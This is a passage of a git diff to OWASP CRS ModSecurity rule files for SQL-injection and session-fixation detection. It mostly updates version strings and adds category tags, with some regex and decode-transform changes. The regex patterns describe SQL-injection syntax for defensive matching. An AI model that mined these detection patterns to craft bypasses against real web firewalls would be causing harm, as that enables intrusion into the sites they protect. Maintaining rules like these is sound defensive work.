@@ -843,9 +868,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -872,9 +898,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -898,9 +925,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -924,9 +952,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -950,9 +979,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -984,9 +1014,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1013,9 +1044,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1038,9 +1070,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1068,9 +1101,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1100,9 +1134,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1126,9 +1161,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1152,9 +1188,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1178,9 +1215,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1209,9 +1247,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1238,9 +1277,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1267,9 +1307,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1308,9 +1349,10 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1324,11 +1366,12 @@ SecRule ARGS_GET:fbclid "@rx [a-zA-Z0-9_-]{61,61}" \
     "id:942441,\
     phase:2,\
     pass,\
-    t:none,t:urlDecodeUni,\
+    t:none,\
     nolog,\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     ctl:ruleRemoveTargetById=942440;ARGS:fbclid,\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
 
 #
 # -=[ Exclusion rule for 942440 ]=-
@@ -1339,11 +1382,12 @@ SecRule ARGS_GET:gclid "@rx [a-zA-Z0-9_-]{91,91}" \
     "id:942442,\
     phase:2,\
     pass,\
-    t:none,t:urlDecodeUni,\
+    t:none,\
     nolog,\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     ctl:ruleRemoveTargetById=942440;ARGS:gclid,\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
 
 #
 # -=[ Detect SQL Comment Sequences ]=-
@@ -1395,9 +1439,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     chain"
     SecRule MATCHED_VARS "!@rx ^ey[\-0-9A-Z_a-z]+\.ey[\-0-9A-Z_a-z]+\.[\-0-9A-Z_a-z]+$" \
@@ -1426,9 +1471,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1473,9 +1519,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1486,7 +1533,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 942520
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`][\s\x0b]*?(?:(?:is[\s\x0b]+not|not[\s\x0b]+(?:like|glob|(?:betwee|i)n|null|regexp|match)|mod|div|sounds[\s\x0b]+like)\b|[%&\*\+\-/<->\^\|])" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\"'`][\s\x0b]*?(?:(?:is[\s\x0b]+not|not[\s\x0b]+(?:like|glob|(?:betwee|i)n|null|regexp|match)|mod|div|sounds[\s\x0b]+like)\b|[%&\*\+\-/<->\^\|]{1,3})" \
     "id:942520,\
     phase:2,\
     block,\
@@ -1500,9 +1547,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1533,9 +1581,10 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.942521_matched_var_name=%{matched_var_name}',\
     chain"
@@ -1561,9 +1610,10 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b"
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1599,9 +1649,10 @@ SecRule REQUEST_BASENAME|REQUEST_FILENAME "@detectSQLi" \
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1631,9 +1682,10 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd(
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1661,17 +1713,18 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)create[\s\x0
     tag:'attack-sqli',\
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:942016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
@@ -1701,9 +1754,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1725,9 +1779,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1765,9 +1820,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1794,9 +1850,10 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
     tag:'attack-sqli',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1815,7 +1872,7 @@ SecRule ARGS "@rx \W{4}" \
     phase:2,\
     block,\
     capture,\
-    t:none,t:urlDecodeUni,\
+    t:none,\
     msg:'Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters',\
     logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
     tag:'application-multi',\
@@ -1824,9 +1881,10 @@ SecRule ARGS "@rx \W{4}" \
     tag:'attack-sqli',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}'"
@@ -1872,9 +1930,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1901,16 +1960,17 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-sqli',\
     tag:'paranoia-level/3',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:942018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
@@ -1935,9 +1995,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'attack-sqli',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1964,9 +2025,10 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
     tag:'attack-sqli',\
     tag:'paranoia-level/4',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SQLI',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.6.0',\
+    ver:'OWASP_CRS/4.15.0-dev',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
diff --git a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
index 733187f0d..2293f1411 100644
--- a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+++ b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:943012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -42,14 +42,15 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'attack-fixation',\
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
+    tag:'OWASP_CRS/ATTACK-SESSION-FIXATION',\
     tag:'capec/1000/225/21/593/61',\
-    ver:'OWASP_CRS/4.6.0',\
